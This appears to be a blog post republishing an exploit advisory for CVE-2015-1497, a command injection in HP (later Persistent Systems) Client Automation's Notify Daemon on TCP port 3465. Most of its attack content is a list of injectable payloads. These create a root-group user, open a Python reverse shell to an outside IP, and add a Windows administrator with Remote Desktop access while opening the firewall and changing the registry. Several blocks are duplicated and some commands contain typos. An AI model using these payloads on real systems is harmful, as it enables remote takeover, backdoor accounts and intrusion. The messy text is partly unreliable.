CVE ID
CVE-2015-1497
Date: [10/10/2016]
Exploit Author: [SlidingWindow],Twitter: @kapil_khot
Vendor Homepage: [Previosuly HP, now http://www.persistentsys.com/]
Version: [Tested on version 7.9 but should work on 8.1, 9.0, 9.1 too]
Tested on: [Windows 7 and CentOS release 6.7 (Final]
CVE-2015-1497
Date: [10/10/2016]
Exploit Author: [SlidingWindow],Twitter: @kapil_khot
Vendor Homepage: [Previosuly HP, now http://www.persistentsys.com/]
Version: [Tested on version 7.9 but should work on 8.1, 9.0, 9.1 too]
Tested on: [Windows 7 and CentOS release 6.7 (Final]
IMPACTS
CVSS Severity (version 2.0)
CVSS v2 Base Score: 10.0 HIGH
Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C)
Impact Subscore: 10.0
Exploitability Subscore: 10.0
CVSS VERSION 2 METRICS
Access Vector: Network exploitable
Access Complexity: Low
Affected Vendors: Hewlett Packard
CAN RUN FOLLOWING COMMANDS ON LINUX TARGET
CVSS Severity (version 2.0)
CVSS v2 Base Score: 10.0 HIGH
Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C)
Impact Subscore: 10.0
Exploitability Subscore: 10.0
CVSS VERSION 2 METRICS
Access Vector: Network exploitable
Access Complexity: Low
Affected Vendors: Hewlett Packard
CAN RUN FOLLOWING COMMANDS ON LINUX TARGET
- Useradd Payload: hide hide sh -c ' useradd amiroot -p ID/JlXFIWowsE -g root'
- Reverse Shell Payload: hide hide sh -c "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.35.140\",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"
- hide hide cmd.exe /c net user hack3r "hack3r" /add hide hide cmd.exe /c net localgroup administrators hack3r /add
- hide hide cmd.exe /c net localgroup "Remote Desktop Users" hack3r /add
- hide hide cmd.exe /c netsh firewall set service RemoteDesktop enable
- hide hide cmd/exe /c netsh firewall set service type=RemoteDesktop mode=enable profile=ALL
- hide hide cmd/exe /c reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
VULNERABILITY DETAILS
This Metasploit module exploits a command injection vulnerability on HP Client Automation allows remote attackers to execute arbitrary commands via a crafted request to TCP port 3465, distributed actually as Persistent Systems Client Automation. The vulnerability exists in the Notify Daemon (radexecd.exe), which doesn't authenticate execution requests by default neither. This Metasploit module has been tested successfully on HP Client Automation 9.00 over Windows 2003 SP2 and CentOS 5. The main impacts of this vulnerability are:
This Metasploit module exploits a command injection vulnerability on HP Client Automation allows remote attackers to execute arbitrary commands via a crafted request to TCP port 3465, distributed actually as Persistent Systems Client Automation. The vulnerability exists in the Notify Daemon (radexecd.exe), which doesn't authenticate execution requests by default neither. This Metasploit module has been tested successfully on HP Client Automation 9.00 over Windows 2003 SP2 and CentOS 5. The main impacts of this vulnerability are:
- Allows unauthorized disclosure of information.
- Allows unauthorized modification.
- Allows disruption of service.
No comments:
Post a Comment